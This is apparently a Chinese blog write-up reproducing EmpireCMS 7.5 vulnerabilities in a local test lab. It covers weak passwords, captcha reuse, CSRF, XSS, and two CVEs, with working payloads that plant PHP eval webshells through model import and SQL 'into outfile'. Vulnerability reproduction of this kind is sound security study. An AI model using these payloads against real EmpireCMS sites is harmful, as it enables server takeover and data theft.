帝国CMS(EmpireCMS)漏洞复现

简介

《帝国网站管理系统》英文译为Empire CMS,简称Ecms,它是基于B/S结构,且功能强大而帝国CMS-logo易用的网站管理系统。

帝国CMS官网:http://www.phome.net/

参考相关漏洞分析文章,加上更详细的渗透测试过程。

参考

帝国CMS(EmpireCMS)v7.5漏洞分析
帝国cms v7.5---漏洞分析

靶场搭建

环境:PHP+Mysql+EmpireCMS<=7.5

安装phpstudy_pro

下载地址:https://www.xp.cn/

十分方便,点击下载安装即可。

安装EmpireCMS

下载地址:http://www.phome.net/download/

解压后放在phpstudy_pro/WWW目录下

与常见的靶场安装相似,访问http://127.0.0.1/upload/e/install/index.php填写相关配置信息安装即可

最后上删除/e/install目录,避免被再次安装.

漏洞复现

身份鉴别类

弱口令

前台可进行密码爆破,弱口令test/test@123

验证码失效

使用同一验证码尝试进行登录,验证码失效,故可进行上述爆破。

且存在敏感信息明文传输,数据包中用户名密码为url编码。

注册功能处同样存在此漏洞。

找回密码处,验证码失效,且可以无限发送密码重置邮件。

CSRF漏洞

修改referer依旧正常返回数据。

XSS漏洞

系统->备份与恢复数据->执行SQL语句,存在XSS漏洞。

进入商城系统,修改mainfile字段为"mainfile=javascript:alert(/xss/)",成果弹窗。

会话重放漏洞

找回密码功能,可无限发送邮件,且验证码未失效。

文件上传漏洞

CVE-2018-18086()

后台,系统->管理数据表-> 导入系统模型,导入一个.php.mod文件,内容如下。
<? php file_put_contents("test.php","<?php @eval(\$_POST['hack']); ?>"); ?>

远程代码执行漏洞

CVE-2018-19462

系统->备份与恢复数据->执行SQL语句,用select ... into outfile语句写入php一句话木马。
select '<?php @eval($_POST[123])?>' into outfile 'C:/phpstudy_pro/WWW/EmpireCMS_7.5_SC_UTF8/getshell.php''

相关推荐
芯盾时代4 小时前
AI在网络安全领域的应用现状和实践
人工智能·安全·web安全·网络安全
安全系统学习10 小时前
【网络安全】漏洞分析:阿帕奇漏洞学习
java·网络·安全·web安全·系统安全
mooyuan天天14 小时前
pikachu靶场通关笔记14 XSS关卡10-XSS之js输出(五种方法渗透)
安全·web安全·xss·pikachu靶场·xss漏洞
饮长安千年月15 小时前
玄机-第六章 流量特征分析-蚂蚁爱上树
windows·计算机网络·web安全·网络安全·系统安全·安全架构
饮长安千年月16 小时前
JavaSec-专题-反序列化
java·开发语言·web安全·网络安全·系统安全·可信计算技术·安全架构
小格子衬衫17 小时前
系统巡检常见工作
网络·安全·web安全
塔子终结者18 小时前
网络安全A模块专项练习任务五解析
安全·web安全·网络安全
中云时代-防御可测试-小余19 小时前
高防服务器价格高原因分析
运维·服务器·tcp/ip·安全·web安全·udp·ddos
独行soc1 天前
2025年渗透测试面试题总结-腾讯[实习]安全研究员(题目+回答)
linux·安全·web安全·面试·职场和发展·渗透测试
毒果1 天前
网络安全:钓鱼邮件、虚假网站与诈骗信息的预防与应对
安全·web安全·php